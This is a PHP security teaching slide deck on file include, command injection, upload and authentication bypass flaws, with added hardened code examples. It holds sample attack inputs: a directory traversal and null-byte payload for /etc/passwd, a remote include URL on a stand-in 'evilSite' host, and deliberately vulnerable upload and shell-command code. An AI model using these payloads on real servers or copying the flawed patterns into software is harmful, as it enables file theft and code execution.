Code Inject File Vuln Auth Bypass


  • 7/29/2019 Code Inject File Vuln Auth Bypass

    1/44

    Copyright Justin C. Klein Keane

    PHP Vulnerability Potpourri

    File Include, Command Injection & Authentication Bypass Vulnerabilities


    File Include Vulnerabilities

    Arbitrary file includes (reading)

    Local file includes

    Remote file includes

    Directory traversal

    Writing arbitrary files


    Basic PHP File Includes

    Four common functions

    include()

    include_once()

    require()

    require_once()

    Difference is that require will die (with fatal E_ERROR) if the specified file is not found

    include() will produce an E_WARNING

    _once functions will not re-include the file if it has already been called


    How Includes Work

    When PHP includes a file it will parse any PHP code within that file

    Anything not delimited with the PHP delimiters (<?php ... ?>) will be treated as plain text

    Plain text will simply be rendered inline


    Typical Include


    Problems with Includes

    Arbitrary local file includes triggered via malicious user input:

    If user supplies ../../../../../../../etc/passwd as the 'action' URL variable, that file will be rendered during page display!


    Incorrect Protection Schemes

    Some programmers will append a file extension to attempt to limit includes like /etc/passwd

    This fails for several reasons, one is because PHP is written in C


    Caveats of C

    C doesn't have a string type

    Instead strings are null terminated character arrays:

        char foo[4];            /* three characters plus the terminating null */

        int main() {
            foo[0] = 'B';
            foo[1] = 'A';
            foo[2] = 'R';
            foo[3] = '\0';      /* the null marks the end of the string */
            return 0;
        }

    Without the null at the end the string would have no end

    C reads from the start of the string until it reaches the null character when printing strings


    Tricking PHP with C Conventions

    Using a null character triggers C constructs and defeats the prior example

    If user passes in: action=../../../../../../etc/passwd%00

    then PHP executes: include('inc/../.././../../etc/passwd');

    Because PHP terminates the string at the null byte (and ignores the appended '.php')

    Most PHP programmers are unaware of this!


    Other Include Strategies

    There are other ways around extension protections

    Attacker can provide the GET var: ?action=/path/to/other/php_file.php?

    renders the final .php as a GET var to the included php_file.php
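As an added example (not code from the slides), the include pattern the preceding slides describe, assumed to be include('inc/' . $_GET['action'] . '.php'), beside a hardened version that maps the action parameter through an allow-list so no user-controlled bytes reach the filesystem path. The null-byte truncation shown above was closed in PHP 5.3.4, but the defence here does not rely on that; the page names, inc directory and 'action' parameter are assumptions.

```php
<?php
// Added example, not from the slides. Assumed shape of the "Typical Include" slide:
// the 'action' query parameter is glued into a path and a .php extension is appended.
function vulnerable_include(array $get): void
{
    // Traversal ("../../etc/passwd"), null bytes ("%00") and, with
    // allow_url_fopen/allow_url_include on, remote URLs all reach include().
    include 'inc/' . $get['action'] . '.php';
}

// Hardened version: the user never supplies a path, only a key into a fixed map.
const PAGES = [
    'home'    => 'home.php',
    'profile' => 'profile.php',
    'help'    => 'help.php',
];

function resolve_page(?string $action): ?string
{
    // Missing, unknown or oddly-formed keys resolve to null (caller shows a 404).
    if ($action === null || !preg_match('/\A[a-z]{1,16}\z/', $action)) {
        return null;
    }
    return PAGES[$action] ?? null;
}

function safe_include(array $get, string $incDir = __DIR__ . '/inc'): bool
{
    $file = resolve_page($get['action'] ?? null);
    if ($file === null) {
        http_response_code(404);
        return false;
    }
    // Belt and braces: confirm the resolved file really lives under inc/.
    $path = realpath($incDir . '/' . $file);
    if ($path === false || strpos($path, realpath($incDir) . DIRECTORY_SEPARATOR) !== 0) {
        http_response_code(404);
        return false;
    }
    include $path;
    return true;
}

// Constructed inputs mirroring the payloads from the slides: only the first maps to a file.
assert(resolve_page('home') === 'home.php');
assert(resolve_page('../../../../../../../etc/passwd') === null);
assert(resolve_page("../../../../../../etc/passwd\0") === null);
assert(resolve_page('/path/to/other/php_file.php?') === null);
```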


    Other Dangers of Includes

    Often times include files are meant to be included, not directly referenced

    Include files live on the filesystem

    May contain vulnerabilities when called directly as variables could be redefined or arbitrarily defined

    Especially dangerous when register_globals is on!


    Example

    Main file:
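The slide's own main file and include file did not survive extraction; the following is an added example (not the author's code) of the entry-point marker guard that stops an include file from being requested directly, with the include file written to a temp directory so the whole demo runs as one script. The marker name IN_APP, the file name admin_panel.php and the $is_admin flag are assumptions.

```php
<?php
// Added example, not from the slides. In a real app the include file would live in
// inc/ (ideally outside the web root); here it is written to a temp dir for the demo.
$incDir  = sys_get_temp_dir() . '/guard_demo_' . getmypid();
mkdir($incDir);
$incFile = $incDir . '/admin_panel.php';

file_put_contents($incFile, <<<'PHP'
<?php
// Included file: refuse to run unless the entry point defined the marker first.
if (!defined('IN_APP')) {
    http_response_code(403);
    exit("Direct access not permitted\n");
}
// Do not trust variables to have been set by the caller: with register_globals
// they could come from the query string. Re-check the authorisation state here.
if (empty($GLOBALS['is_admin'])) {
    http_response_code(403);
    exit("Admin only\n");
}
echo "Admin panel rendered\n";
PHP);

// 1) Intended use: the entry point defines the marker and the authorisation
//    state, then includes the file.
define('IN_APP', true);
$is_admin = true;               // would come from the real session check
include $incFile;

// 2) Direct request of the include file, simulated by running it in a fresh PHP
//    process where IN_APP was never defined: the guard refuses.
$direct = shell_exec(escapeshellarg(PHP_BINARY) . ' ' . escapeshellarg($incFile));
echo "Direct call output: " . $direct;

unlink($incFile);
rmdir($incDir);
```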


    Remote File Include

    Rather than specifying a local resource, an attacker could specify a remote file for inclusion

    Remote files must be served as plain text, rather than compiled PHP

    Remote text is pulled for inclusion then the local PHP compiler interprets the text, rendering the PHP locally


    Remote File Include Requirements

    /etc/php.ini has parameters that define the ability of PHP to include files:

        ;;;;;;;;;;;;;;;;;;;
        ; Fopen wrappers ;
        ;;;;;;;;;;;;;;;;;;;

        ; Whether to allow the treatment of URLs (like http:// or ftp://) as files.
        allow_url_fopen = On


    If allow_url_fopen is On

    Attackers can include remote files:

    Attacker can call

    ?action=http://evilSite.tld/evil_script.txt?


    Other Include Strategies

    Attackers can use includes to bypass direct access restrictions such as .htaccess

    This could be used to expose files like config.ini files

    Attackers can include Apache files like .htpasswd or .htaccess files, which are included as plain text, exposing their contents

    Attackers can subvert program flow by calling files that are normally not included

    Attackers can call files readable by Apache, such as files in /tmp which may contain sensitive data (like session cookies or malicious uploads)


    Writing Files

    PHP functionality used to write files includes:

    File upload functions built into an application (such as image uploads)

    Utilizing PHP filesystem commands such as fwrite()


    Typical Image Upload Handler

        $upload_dir = "files/";
        $filename = basename($_FILES['form_filename']['name']);
        $target = $upload_dir . $filename;

        // the client's filename is used as-is and the file type is never checked
        if (move_uploaded_file($_FILES['form_filename']['tmp_name'], $target)) {
            echo $filename . " has been uploaded";
        } else {
            echo "Error uploading file!";
        }


    Common Upload Errors

    Collisions cause overwrites

    File type is not checked

    Programmer may assume only image files are being uploaded, but this isn't enforced

    File type is checked inappropriately

    Simply checking $_FILES['upload_file']['type'] is insufficient since this is a browser provided parameter

    Double extensions (and programmer only checks the first one)
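An added example (not the author's code) of a replacement for the typical image upload handler that addresses each error listed above: the content is sniffed instead of trusting the browser's type, the stored name is chosen by the server so collisions, double extensions and .htaccess names cannot occur, and the file lands outside the web root. The field name form_filename is taken from the slide; the upload directory, size limit and accepted types are assumptions.

```php
<?php
// Added example, not from the slides. UPLOAD_DIR is an assumed path that Apache
// does not serve; images are later delivered through a script, not by direct URL.
const UPLOAD_DIR = '/var/www/uploads_private';
const ALLOWED = [
    // MIME type detected from the file's content => extension we store it under
    'image/png'  => 'png',
    'image/jpeg' => 'jpg',
    'image/gif'  => 'gif',
];
const MAX_BYTES = 2 * 1024 * 1024;

// Returns ['ok' => bool, 'msg' => string]; the message is safe to show the user.
function handle_upload(array $file): array
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        return ['ok' => false, 'msg' => 'Error uploading file!'];
    }
    if ($file['size'] > MAX_BYTES || !is_uploaded_file($file['tmp_name'])) {
        return ['ok' => false, 'msg' => 'File rejected'];
    }
    // Neither $_FILES[...]['type'] nor the client's filename/extension is trusted:
    // both are supplied by the browser. Sniff the content instead.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!isset(ALLOWED[$mime]) || getimagesize($file['tmp_name']) === false) {
        return ['ok' => false, 'msg' => 'Only PNG, JPEG or GIF images are accepted'];
    }
    // Server-chosen random name: no overwrites of existing files, no double
    // extensions, no .php or .htaccess names, whatever the client called it.
    $name   = bin2hex(random_bytes(16)) . '.' . ALLOWED[$mime];
    $target = UPLOAD_DIR . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $target)) {
        return ['ok' => false, 'msg' => 'Error uploading file!'];
    }
    chmod($target, 0640);   // readable by the app, never executable
    return ['ok' => true, 'msg' => $name . ' has been uploaded'];
}

$result = handle_upload($_FILES['form_filename'] ?? []);
echo htmlspecialchars($result['msg'], ENT_QUOTES, 'UTF-8');
```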


    Exploits for File Uploads

    Attacker uploads a PHP file which contains a backdoor or exposes other system files

    Attacker uploads a .htaccess file overwriting Apache rules

    Attacker overwrites existing files to insert a backdoor


    Fwrite()

    The fwrite() function is a built in function that allows PHP, running as the Apache user, to write to file handles

    Often used in installers to write config files

    Also commonly used for logging

    For more information see:

    http://us3.php.net/manual/en/function.fwrite.php


    What is Command Injection

    Also known as arbitrary code execution

    Attacker injects malicious input that is then passed to functions that execute shell commands based on the input


    Typical Example


    Injection Strategies

    Shell commands are delimited by a semi-colon, so multiple commands can be chained together

    The pound or hash (#) symbol denotes the beginning of a comment on the shell, any text following it will be ignored

    Strategies similar to SQL injection can be utilized


    Functions to Watch

    Luckily, the list of commands which execute via a shell is somewhat limited:

    system() - Executes the command and returns output

    exec() - Executes command, can populate PHP variables with output and return values

    passthru() - Executes command but only returns return status


    Other Dangerous Functions

    There are other, less common functions to watch out for

    Backtick operators: $retval = `ls -lh *.php`;

    shell_exec() - Same as backtick


    Pipe Operations

    PHP has commands that can open a pipe to a process, so input and output can be directed to the process

    popen() and pclose()

        // the command and the mode are strings; 'r' reads the process's output
        $proc = popen('/bin/ls', 'r');

    proc_open() - Offers more command control


    Command Sanitization

    PHP has two commands that can be used to scrub input before passing it to a command

    escapeshellarg() - Adds quotes around string and escapes any internal quotes

    escapeshellcmd() - Escapes all special characters that could be used to interrupt or override execution flow

    Note that you should still strive to sanitize to known good commands
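The slide's "Typical Example" code did not survive extraction, so this added example (not the author's code) uses an assumed "ping a host" feature to show the injectable pattern next to the layered fix the slide recommends: sanitize to a known-good shape first, then quote with escapeshellarg() anyway. Host names and the ping command are assumptions; the vulnerable function is defined but never called.

```php
<?php
// Added example, not from the slides.

// Vulnerable: the host is pasted into the command line verbatim, so the shell
// metacharacters from the "Injection Strategies" slide (; # | ...) are honoured.
function ping_vulnerable(string $host): ?string
{
    return shell_exec("ping -c 1 " . $host);
}

// Layer 1: accept only a known-good shape (IPv4 address or DNS hostname).
function valid_host(string $host): bool
{
    if (strlen($host) > 253) {
        return false;
    }
    if (filter_var($host, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4) !== false) {
        return true;
    }
    $label = '[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?';
    return (bool) preg_match("/\\A{$label}(?:\\.{$label})*\\z/i", $host);
}

// Layer 2: even validated input is quoted, so a validation slip cannot change
// the command structure.
function ping_hardened(string $host): ?string
{
    if (!valid_host($host)) {
        return null;   // caller reports "invalid host"; nothing reaches the shell
    }
    return shell_exec('ping -c 1 ' . escapeshellarg($host));
}

// Constructed inputs: a normal host, a chained command and a comment trick.
foreach (['localhost', '10.0.0.1', 'localhost; id', 'localhost # x'] as $input) {
    $verdict = valid_host($input) ? 'accepted' : 'rejected';
    echo str_pad($input, 20) . " => $verdict\n";
}
```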


    Other Nefarious Outliers

    preg_replace with the /e flag allows for command execution

    This is certainly not the first place you would look to find command execution!


    Executing PHP Commands

    Using the eval() command

    Because of PHP's dynamic nature, variables can actually be interpreted as commands:
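The eval() code from this slide is missing from the extracted text; the following added example (not the author's code) shows the two execution sinks from this and the previous slide, preg_replace /e and eval()-style dynamic dispatch, each next to the construct that replaces it without evaluating strings as code. The action names and callback are constructed for the demo.

```php
<?php
// Added example, not from the slides.

// (1) preg_replace() with /e evaluated the replacement string as PHP, so any
//     user-influenced replacement became code execution. /e was removed in
//     PHP 7.0; preg_replace_callback() does the job with a real function instead.
function upper_words_safe(string $text): string
{
    return preg_replace_callback('/\b[a-z]+\b/', function (array $m): string {
        return ucfirst($m[0]);
    }, $text);
}

// (2) eval("$action();") or a variable function $action() turns request data into
//     code. When a request must select behaviour, map the untrusted name onto a
//     fixed table so only functions listed here can ever be reached.
const ACTIONS = [
    'list'   => 'action_list',
    'export' => 'action_export',
];
function action_list(): string   { return "listing records\n"; }
function action_export(): string { return "exporting records\n"; }

function dispatch(string $action): string
{
    if (!isset(ACTIONS[$action])) {
        return "unknown action\n";   // never becomes a function call
    }
    $fn = ACTIONS[$action];
    return $fn();
}

echo upper_words_safe("hello from the upload handler"), "\n";
echo dispatch('list');
echo dispatch('system');   // rejected by the table, whatever name is supplied
```

Note that eval is a language construct rather than a function, so the disable_functions directive on the next slide cannot switch it off; code review is the only control for it.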


    Mitigation

    PHP's php.ini contains a rarely used directive:

        ; This directive allows you to disable certain functions for security reasons.
        ; It receives a comma-delimited list of function names. This directive is
        ; *NOT* affected by whether Safe Mode is turned On or Off.
        disable_functions = exec, system, passthru, eval

    Won't completely cut off avenues of attack but can limit the programmer's power to introduce vulnerabilities

    No way to limit backticks via php.ini


    Auth Bypass

    Authentication bypass is a vulnerability that allows an attacker to gain access to functionality without providing valid credentials

    Attackers may seek to steal an authenticated user's session

    May also be possible to initiate a privileged session without credentials

    Some functionality may not need a session


    Session Handling

    PHP controls session data via a PHPSESSID cookie by default (defined in php.ini)


    Session Cookies

    Difficult to predict/guess

    However, stored on the filesystem

    Location determined by settings in /etc/php.ini:

        session.save_path = "/var/lib/php/session"

        ; Whether to use cookies.
        session.use_cookies = 1
        ; This option enables administrators to make their users invulnerable to
        ; attacks which involve passing session ids in URLs; defaults to 0.
        ; session.use_only_cookies = 1
        ; Name of the session (used as cookie name).
        session.name = PHPSESSID
        ; Initialize session on request startup.
        session.auto_start = 0
        ; Lifetime in seconds of cookie or, if 0, until browser is restarted.
        session.cookie_lifetime = 0
        ; The path for which the cookie is valid.
        session.cookie_path = /
        ; The domain for which the cookie is valid.
        session.cookie_domain =


    Permissions on Session Dir

        # ls -lah /var/lib/php
        total 156K
        drwxr-xr-x  3 root root   4.0K Jun  2 12:13 .
        drwxr-xr-x 21 root root   4.0K Jun  2 12:42 ..
        drwxrwx---  2 root apache 132K Jun 22 14:37 session

    Note that apache can read and write in this directory


    phpinfo() Disclosure


    Data Can be Leaked

    If attacker can leverage webapp to list the cookie directory they can modify their own cookies

    Cookie isn't tied to an IP, so cookie holder automatically gains session access

    Cookie can also be stolen from the end user

    JavaScript can access cookies with domain restrictions


    Logical Flaws

    Application fails to check credentials properly

    Name collisions for instance

    These will not be programming errors so are much more difficult to detect


    Limited Authentication

    Application may only check for authentication in one place

    Some files may assume that authentication has taken place but may be accessible outside of that flow


    Brute Force

    Steps should be taken to limit authentication attempts

    At the very least log auth attempts and alert someone on multiple failures

    Be sure to limit login failure feedback (don't alert an attacker to whether or not a username or password exists)

    Be wary of password recovery functionality and information it might disclose to an attacker



    Logout Failure

    Applications that don't properly end sessions could leave them open for exploitation

    Kiosks or other public terminals are prime offenders in these circumstances
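An added example (not the author's code) of session helpers that close the gaps described in the auth bypass slides: the id is rotated at login, idle sessions are expired on the server so an abandoned kiosk session dies on its own, and logout destroys the server-side record rather than only dropping the client cookie. It assumes PHP 7.3 or later for the array form of session_set_cookie_params() and an idle limit of 900 seconds as a policy value.

```php
<?php
// Added example, not from the slides.
const IDLE_LIMIT = 900;   // seconds; assumed policy value

function session_start_hardened(): void
{
    session_set_cookie_params([
        'lifetime' => 0,
        'path'     => '/',
        'secure'   => true,      // only sent over TLS (see "Unencrypted Authentication")
        'httponly' => true,      // not readable by JavaScript
        'samesite' => 'Lax',
    ]);
    ini_set('session.use_only_cookies', '1');   // never accept PHPSESSID from a URL
    ini_set('session.use_strict_mode', '1');    // reject ids the server never issued
    session_start();
    // Idle timeout enforced server-side; the cookie lifetime alone is client-controlled.
    if (isset($_SESSION['last_seen']) && time() - $_SESSION['last_seen'] > IDLE_LIMIT) {
        logout();
        session_start();
    }
    $_SESSION['last_seen'] = time();
}

function login(int $userId): void
{
    // Fresh id after authentication so a pre-login id cannot be replayed (fixation).
    session_regenerate_id(true);
    $_SESSION['user_id']   = $userId;
    $_SESSION['last_seen'] = time();
}

function logout(): void
{
    $_SESSION = [];
    // Expire the cookie on the client ...
    $p = session_get_cookie_params();
    setcookie(session_name(), '', time() - 42000, $p['path'], $p['domain'], $p['secure'], $p['httponly']);
    // ... and destroy the server-side file so the old id is worthless even if copied.
    session_destroy();
}
```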



    Unencrypted Authentication

    Cookies and/or post data may be stolen

    Forms themselves should be encrypted, not just their post targets

    MITM plain text keystroke loggers could be utilized on unencrypted login forms



    Information Disclosure

    There are many seemingly innocuous ways that information valuable to an attacker can be disclosed

    Debugging messages

    phpinfo() output can reveal configuration information

    Plain text files such as .ini or .htaccess or .htpasswd files could be exposed

    Directory listing could show files that would otherwise be difficult to find

    HTML comments



    Exposed Information

    Assume any web accessible file can be read by an attacker

    Tools for brute force guessing filenames and directories exist

    Look at include files to make sure they can't be abused by being called directly